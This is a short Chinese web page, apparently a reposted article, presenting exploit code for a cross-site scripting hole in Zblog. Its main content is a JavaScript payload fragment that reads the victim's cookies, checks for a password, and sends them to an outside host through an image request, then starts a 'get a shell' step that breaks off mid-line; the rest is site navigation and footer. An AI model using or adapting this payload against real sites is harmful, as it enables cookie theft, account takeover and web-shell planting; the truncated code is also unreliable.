主页 / 网站建设 /

Zblog最新跨站漏洞及利用代码

网站建设 2021-07-03 10:02www.dzhlxh.cn网站建设

  Js里可以写shell,添加用户,偷取COOKIE然后模拟出真正的转向

  xmlhttp=poster();

  cookie=document.cookie;

  login=cookie.indexOf(‘password’)==-1?0:1;

  tolocation=’https://www.jb51.net/’;

  //get cookie

  x=new Image();

  x.src=”www.dosjj.com/c.php?c=”+escape(document.cookie);

  //get a shell

  data=”txaContent=

上一篇:xyxcms v1.3 小游戏CMS 漏洞说明 下一篇:金山毒霸多个sql注入及XSS漏洞和修复

网站设计

Copyright © 2016-2025 www.dzhlxh.cn 金源码 版权所有 Power by

网站模板下载|网络推广|微博营销|seo优化|视频营销|网络营销|微信营销|网站建设|织梦模板|小程序模板